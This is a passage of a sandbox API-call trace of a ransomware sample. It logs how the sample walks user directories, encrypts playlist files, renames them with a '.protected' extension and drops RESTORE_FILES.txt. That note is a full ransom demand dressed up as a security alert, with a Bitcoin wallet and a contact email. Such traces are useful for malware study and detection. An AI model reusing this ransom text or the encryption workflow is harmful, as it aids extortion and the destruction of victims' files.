player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0085.001] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 
[0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.006] CloseHandle (hObject=0x158) returned 1 [0085.006] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.protected") returned 127 [0085.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.protected")) returned 1 [0085.007] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0085.007] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0085.007] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\RESTORE_FILES.txt") returned 118 [0085.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0085.008] lstrlenA (lpString="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") returned 684 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0085.009] CloseHandle (hObject=0x154) returned 1 [0085.009] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Windows") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files (x86)") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="$Recycle.bin") returned 1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="System Volume Information") returned -1 [0085.009] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 100 [0085.009] lstrcmpW (lpString1="00010C6E", lpString2=".") returned 1 [0085.009] lstrcmpW (lpString1="00010C6E", lpString2="..") returned 1 [0085.009] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 102 [0085.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 
[0085.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\.") returned 102 [0085.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\..") returned 103 [0085.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.013] 
lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.013] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.013] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 
[0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.014] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0085.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0085.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.016] CloseHandle (hObject=0x158) returned 1 [0085.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 145 [0085.017] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0085.017] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.017] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.017] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.018] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.018] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.018] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.018] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.018] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.019] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0085.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.027] WriteFile (in: hFile=0x158, 
lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0085.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.027] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.028] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.028] CloseHandle (hObject=0x158) returned 1 [0085.028] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected") returned 147 [0085.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0085.029] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.029] lstrcmpiW 
(lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.029] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.029] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.029] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.030] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0085.031] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.031] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0085.032] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.032] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.032] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 
[0085.032] CloseHandle (hObject=0x158) returned 1 [0085.032] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 145 [0085.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0085.033] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.033] wnsprintfW (in: pszDest=0x4cfb68, 